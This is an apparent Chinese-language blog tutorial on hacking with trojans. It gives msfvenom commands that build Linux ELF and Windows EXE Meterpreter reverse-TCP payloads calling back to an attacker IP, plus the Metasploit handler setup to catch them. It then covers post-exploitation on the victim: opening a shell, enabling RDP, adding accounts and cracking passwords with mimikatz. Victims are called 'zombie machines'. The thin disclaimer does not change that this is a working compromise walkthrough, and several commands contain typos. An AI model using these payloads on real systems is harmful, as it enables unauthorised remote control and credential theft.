黑客攻擊-木馬程序(1)

聲明:禁止用作非法目的,謝絕一切形式的轉載。

當你在無意間點擊一個鏈接後,當你在不明情況安裝一個程序時,當你忍不住點擊一個美女圖片的時候,你的設備可能就此淪陷了,成爲了黑客眼中的"肉雞"。

kali Linux

Kali Linux是基於Debian的Linux發行版, 設計用於數字取證操作系統。由Offensive Security Ltd維護和資助。最先由Offensive Security的Mati Aharoni和Devon Kearns通過重寫BackTrack來完成,BackTrack是他們之前寫的用於取證的Linux發行版 。

Metersploit

Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。

Meterpreter

Meterpreter是 Metasploit 框架中的一個殺手鐗,通常作爲漏洞溢出後的攻擊使用, 攻擊觸發發漏洞後能夠返回給我們一個控制通道.

Linux攻擊

生成木馬

網絡上有好多生成木馬的方式,但是大多數都是相互copy,甚至有的還可能包含病毒,謹慎使用。網絡上下載的所有軟件都要慎用,除非是在官網上下載的。
生成一個使用於Lnux 64位系統的木馬,生成木馬的命令如下:

msfvenom -a x64 --platform linux  -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=5555  -i 3 -f elf -o test

LHOST 代表Listening host。LPORT代表Listening port。後續介紹網絡的時候會詳細講解。

翻譯一下這個命令:平臺Linux x64架構,使用payload是linux/x64/meterpreter/reverse_tcp,目標文件的格式是elf。可執行目標文件的名稱是test。
通過上面的命令,我們就就可以生成一個elf格式的test程序,當在遠端(也就是"肉雞")執行這個程序的時候,如果本地開啓了監聽,肉雞和本機之間就建立了一條通信的channel,通過這個木馬就能實現控制遠端的肉雞了,邪惡的微笑。

開啓監聽

  1. 開啓msf
msfconsole
  1. 加載模塊
msf5 > use exploit/multi/handler 
  1. 設置payload
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
  1. 設置監聽ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
  1. 設置監聽port
msf5 exploit(multi/handler) > set LPORT 5555
  1. 執行
msf5 exploit(multi/handler) > exploit

攻擊效果

當執行完exploit之後,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進程等。
在這裏插入圖片描述可以開啓一個shell,這樣基本等同於完全操控目標計算機了。
在這裏插入圖片描述
在這裏插入圖片描述通過查看whoami可知正是當前登陸用戶的帳號。如何提升權限,後續會介紹。

Windows攻擊

生成木馬

msfvenom -a x64 --platform windows  -p windows/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=4444  -i 3 -f exe -o payload_test.exe

具體含義可參考上文。

開啓監聽

  1. 開啓msf
msfconsole
  1. 加載模塊
msf5 > use exploit/multi/handler 
  1. 設置payload
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  1. 設置監聽ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
  1. 設置監聽port
msf5 exploit(multi/handler) > set LPORT 4444
  1. 執行
msf5 exploit(multi/handler) > exploit

攻擊效果

當執行完exploit之後,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進程等。同Linux。
在這裏插入圖片描述查看那getuid是Administrator,管理員權限。在Windows下,這還不是最高的權限,最高的權限是system,至於如何提權,後續會講解。

在這裏插入圖片描述開啓一個shell,發現有亂碼,這是由於Linux和Windows採用的編碼方式不一致導致的。可以通過chcp 65001解決這個問題。

桌面截圖

在這裏插入圖片描述

開啓遠程桌面

通過以下命令開啓rdp服務

run post/windows/manager/enable_rdp

如圖:
在這裏插入圖片描述

添加用戶

在這裏插入圖片描述

帳號密碼破解

使用minikatz進行密碼破解
在這裏插入圖片描述

遠程桌面

通過rdestop 目標ip -u 賬戶,可以實現遠程桌面的控制。
在這裏插入圖片描述
在這裏插入圖片描述

公衆號

瞭解更多網絡安全內容,歡迎關注我的公衆號:無情劍客
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章